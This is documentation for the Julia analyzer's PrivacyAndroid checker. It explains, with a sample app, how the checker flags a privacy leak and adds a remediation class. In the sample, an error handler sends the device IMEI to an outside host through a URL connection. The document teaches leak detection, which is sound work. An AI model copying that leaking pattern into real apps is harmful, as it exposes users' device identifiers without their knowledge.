Checker PrivacyAndroid, as of Julia version 2.4 (built on 23 Oct 2017)

belongs to group Advanced

Identifies potentially dangerous information flows in Android applications.



Examples


Consider the following program:

public class MainActivity extends AppCompatActivity {
    private Button button;
    private EditText text;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        button = (Button) this.findViewById(R.id.goToSecond);
        button.setOnClickListener( new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                String writeText=text.getText().toString();
                memorizeText(writeText);
            }
        });
    }

    private void memorizeText(String writeText) {
        try {
            OutputStreamWriter outputStreamWriter = new OutputStreamWriter(this.openFileOutput("StoreMyNotes.txt", Context.MODE_PRIVATE));
            outputStreamWriter.write(writeText);
            outputStreamWriter.close();
        }
        catch (IOException e) {
            Log.d("Err",e.getMessage());
            onBugShake();
        }
    }

    private void onBugShake(){
        TelephonyManager tm =(TelephonyManager)getApplicationContext().getSystemService(Context.TELEPHONY_SERVICE);
        try {
            URL myUrl = new URL("http://www.captureIssues.com/memorize?device="+ Build.DEVICE+"&id="+ tm.getDeviceId()+"&system="+Build.VERSION.SDK_INT);
            URLConnection uc=myUrl.openConnection();
            uc.connect();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

This checker issues the following warning:

UrlInjectionAndroid.java:38: [PrivacyAndroid: URLInjectionWarning] possible URL-injection through the 0th actual parameter of init

Let us discuss the motivation for the warning. Sensitive information flows into the first parameter of a URL connection, so the web server receives sensitive information about the device. In this example, the leaked data is the IMEI code of the device. The source of the leak is the method TelephonyManager.getDeviceId(), which is annotated as @UntrustedDevice. The sink is on the same line: the constructor of the URL object (this is the init mentioned in the warning) receives a parameter that is the string representation of the URL. That parameter is annotated as @UrlTrusted, so the warning is the result of tainted data flowing into the constructor parameter.

The goal of the Privacy checker is similar to that of the InjectionChecker: the Privacy checker applies the behaviours and capabilities of the Injection checker to the Android OS context. Indeed, the PrivacyChecker extends Injection, but it overrides some option parameters. In particular, the boolean @UntrustedDevice is the only one that is true by default.
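
A possible remediation for the flagged flow, as an added example that is not part of the Julia documentation or of the original program: the report URL is built from a random per-installation identifier instead of TelephonyManager.getDeviceId(), so the IMEI never reaches the URL constructor. The class name IssueReportUrl, the preference names and the use of HTTPS are assumptions of this example.

```java
import android.content.Context;
import android.content.SharedPreferences;
import android.net.Uri;
import android.os.Build;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.UUID;

/** Hypothetical helper (not from the original example) that builds the bug-report URL. */
public final class IssueReportUrl {
    // Constructed names: the preference file and key are assumptions of this example.
    private static final String PREFS = "issue_report";
    private static final String KEY_INSTALL_ID = "install_id";

    private IssueReportUrl() {}

    /**
     * Returns a random identifier scoped to this installation. It is created on
     * first use, kept in app-private storage and lost on uninstall, so it does
     * not identify the physical device the way an IMEI does.
     */
    static synchronized String installId(Context context) {
        SharedPreferences prefs = context.getSharedPreferences(PREFS, Context.MODE_PRIVATE);
        String id = prefs.getString(KEY_INSTALL_ID, null);
        if (id == null) {
            id = UUID.randomUUID().toString();
            prefs.edit().putString(KEY_INSTALL_ID, id).apply();
        }
        return id;
    }

    /** Builds the report URL without reading TelephonyManager.getDeviceId(). */
    public static URL build(Context context) throws MalformedURLException {
        Uri uri = new Uri.Builder()
                .scheme("https") // assumption: the endpoint accepts HTTPS
                .authority("www.captureIssues.com")
                .appendPath("memorize")
                // appendQueryParameter percent-encodes each value
                .appendQueryParameter("device", Build.DEVICE)
                .appendQueryParameter("id", installId(context))
                .appendQueryParameter("system", String.valueOf(Build.VERSION.SDK_INT))
                .build();
        return new URL(uri.toString());
    }
}
```

onBugShake() would call IssueReportUrl.build(this) in place of the string concatenation, and should open the connection off the main thread.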